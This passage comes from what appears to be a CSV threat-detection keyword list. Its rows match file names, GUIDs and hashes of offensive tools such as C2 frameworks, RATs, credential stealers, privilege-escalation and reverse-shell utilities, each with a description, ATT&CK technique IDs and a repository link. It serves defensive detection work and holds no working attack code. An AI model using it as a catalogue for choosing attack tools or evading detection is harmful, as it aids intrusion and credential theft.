TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*data/payloads/stager.ps1*",".{0,1000}data\/payloads\/stager\.ps1.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*data/shell/backdoors*",".{0,1000}data\/shell\/backdoors.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*data/shell/stagers*",".{0,1000}data\/shell\/stagers.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*data/wordlist_256.txt*",".{0,1000}data\/wordlist_256\.txt.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*data/wordlists*",".{0,1000}data\/wordlists.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Data\VulnerableCOM.csv*",".{0,1000}Data\\VulnerableCOM\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*database/c2.db*",".{0,1000}database\/c2\.db.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*DataBouncing-main.zip*",".{0,1000}DataBouncing\-main\.zip.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*DataSploit*",".{0,1000}DataSploit.{0,1000}","offensive_tool_keyword","datasploit","Performs OSINT on a domain / email / username / phone and find out information from different sources","T1247 - T1593 - T1271 - T1110 - T1122 - T1123","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/dvopsway/datasploit","1","1","N/A","N/A","3","252","661","2022-12-04T16:02:57Z","2016-05-26T03:34:43Z" "*datr=80ZzUfKqDOjwL8pauwqMjHTa*",".{0,1000}datr\=80ZzUfKqDOjwL8pauwqMjHTa.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*DavidXanatos/DiskCryptor*",".{0,1000}DavidXanatos\/DiskCryptor.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*DavRelayUp.csproj*",".{0,1000}DavRelayUp\.csproj.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*DavRelayUp.exe*",".{0,1000}DavRelayUp\.exe.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*DavRelayUp.sln*",".{0,1000}DavRelayUp\.sln.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*DavRelayUp-master*",".{0,1000}DavRelayUp\-master.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","495","78","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*Daybr4ak/C2ReverseProxy*",".{0,1000}Daybr4ak\/C2ReverseProxy.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*dazzleUP.cna*",".{0,1000}dazzleUP\.cna.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.exe*",".{0,1000}dazzleUP\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.sln*",".{0,1000}dazzleUP\.sln.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.vcxproj*",".{0,1000}dazzleUP\.vcxproj.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.x32.exe*",".{0,1000}dazzleUP\.x32\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP.x64.exe*",".{0,1000}dazzleUP\.x64\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP_Reflective_DLL*",".{0,1000}dazzleUP_Reflective_DLL.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*dazzleUP-master*",".{0,1000}dazzleUP\-master.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","486","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*db03400af112a7969ba2d68288b9dc908b2d234d62184fd5f01079749c4bf09e*",".{0,1000}db03400af112a7969ba2d68288b9dc908b2d234d62184fd5f01079749c4bf09e.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*db0db42180fbc1a5bc259234ec07d437986660e88545a49563f4f5ccb761c363*",".{0,1000}db0db42180fbc1a5bc259234ec07d437986660e88545a49563f4f5ccb761c363.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*db0e36392ef1430eae933b1fd0e94c0dd4f7d08ed93cfe369a7d73ed76082c93*",".{0,1000}db0e36392ef1430eae933b1fd0e94c0dd4f7d08ed93cfe369a7d73ed76082c93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*db15d8f9e04fd3d793065e806b32df940949676a7b5013be10b1285fd4cd5676*",".{0,1000}db15d8f9e04fd3d793065e806b32df940949676a7b5013be10b1285fd4cd5676.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*db1f07bcc1caabad3c0a5bbeddf48f542193e0576e8c3ee42594c4a3e29d8895*",".{0,1000}db1f07bcc1caabad3c0a5bbeddf48f542193e0576e8c3ee42594c4a3e29d8895.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*db2_default_pass.txt*",".{0,1000}db2_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*db2_default_user.txt*",".{0,1000}db2_default_user\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DB234158-233E-4EC4-A2CE-EF02699563A2*",".{0,1000}DB234158\-233E\-4EC4\-A2CE\-EF02699563A2.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*db2b4e0e013a0302f6ebe82935a1e416b6672dd447030c194c638585525c3354*",".{0,1000}db2b4e0e013a0302f6ebe82935a1e416b6672dd447030c194c638585525c3354.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*db3bd2d5d62c49cf1b49ff0cd04a11da4e21006acb72bb193b776d1abaddb8a9*",".{0,1000}db3bd2d5d62c49cf1b49ff0cd04a11da4e21006acb72bb193b776d1abaddb8a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*db40433bbaa08ed43bfaf5d3535372a95c7c10a5803bd9e1ec95157bb65ce6bd*",".{0,1000}db40433bbaa08ed43bfaf5d3535372a95c7c10a5803bd9e1ec95157bb65ce6bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*db5b21d5a66fadcebe25ed1bcac0cd5590a3afdf1e9d247a3d169ffcd0a78e62*",".{0,1000}db5b21d5a66fadcebe25ed1bcac0cd5590a3afdf1e9d247a3d169ffcd0a78e62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*db62ef03d6be4778d3ec0fd2f6cb2cf030f02a70efa1f30850b27e0cefd50e9e*",".{0,1000}db62ef03d6be4778d3ec0fd2f6cb2cf030f02a70efa1f30850b27e0cefd50e9e.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*db7d3e12a58a102b76c1f6e041d0a464ccbffc346dbc338a8cb4a7e5ec508b6c*",".{0,1000}db7d3e12a58a102b76c1f6e041d0a464ccbffc346dbc338a8cb4a7e5ec508b6c.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*db85afa956f0a0b6ec30c13259782a0759a5adb2f5dc01969068bb4137364d15*",".{0,1000}db85afa956f0a0b6ec30c13259782a0759a5adb2f5dc01969068bb4137364d15.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*DB8A345D-E19C-4C2A-9FDF-16BF4DD03717*",".{0,1000}DB8A345D\-E19C\-4C2A\-9FDF\-16BF4DD03717.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*db8b7152534b483ed966cd9557bed083106b448feea5e06d6963c0bd7b282f40*",".{0,1000}db8b7152534b483ed966cd9557bed083106b448feea5e06d6963c0bd7b282f40.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*db9e318fce9098eb3ae55a782aee7f29667772302296b4e4924e0edb88e69560*",".{0,1000}db9e318fce9098eb3ae55a782aee7f29667772302296b4e4924e0edb88e69560.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A*",".{0,1000}DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*dbb049e7216149b1723b7dbbf9e3e80ce4a0f2d78b2afa8b2cf451c1e5d97b91*",".{0,1000}dbb049e7216149b1723b7dbbf9e3e80ce4a0f2d78b2afa8b2cf451c1e5d97b91.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","file_hash","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*dbc10feaef6ccaf49866bac8d3ddc48729e7163639d6e0fcdad9e8f90178896b*",".{0,1000}dbc10feaef6ccaf49866bac8d3ddc48729e7163639d6e0fcdad9e8f90178896b.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*DBC2.git*",".{0,1000}DBC2\.git.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2_agent.cs*",".{0,1000}dbc2_agent\.cs.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2_agent.exe*",".{0,1000}dbc2_agent\.exe.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2Loader.dll*",".{0,1000}dbc2Loader\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2Loader.exe*",".{0,1000}dbc2Loader\.exe.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2Loader.tpl*",".{0,1000}dbc2Loader\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2LoaderWrapperCLR.*",".{0,1000}dbc2LoaderWrapperCLR\..{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dbc2LoaderWrapperCLR_x64.dll*",".{0,1000}dbc2LoaderWrapperCLR_x64\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 